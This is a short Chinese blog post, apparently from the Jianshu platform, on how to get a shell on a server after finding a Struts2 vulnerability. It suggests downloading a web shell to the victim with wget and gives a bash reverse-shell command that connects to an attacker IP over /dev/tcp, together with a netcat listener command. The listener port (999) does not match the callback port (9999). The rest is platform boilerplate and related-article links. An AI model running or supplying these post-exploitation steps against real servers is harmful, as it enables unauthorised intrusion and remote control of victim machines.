从struts2漏洞到getshell思路

思考:

利用常见的struts2漏洞检查工具发现有漏洞后该如何进一步操作呢?

参考思路:

1、wget下载shell到受害主机上进行操作

2、利用bash 反弹一个shell,用nc连接(受害主机上执行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1,攻击者的主机上执行 nc -lvnp 999)


©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 官网 中文版本 好的网站 Content-type: text/htmlBASH Section: User ...
    不排版阅读 10,036评论 0 5
  • 背景 前段时间因为使用Flink默认配置,没有禁用通过web上传jar包提交作业的功能,同时服务器配有公网地址,也...
    AI猫头鹰阅读 5,196评论 0 0
  • S2-005漏洞S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的。我们都知道访问Ognl的上下文对...
    能饮一杯无_5d3a阅读 9,458评论 1 0
  • 作者:Gilberto Najera-Gutierrez译者:飞龙协议:CC BY-NC-SA 4.0 简介 这章...
    三月行者阅读 5,891评论 2 7
  • 运行操作 CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) CM...
    小明yz阅读 7,983评论 0 8

友情链接更多精彩内容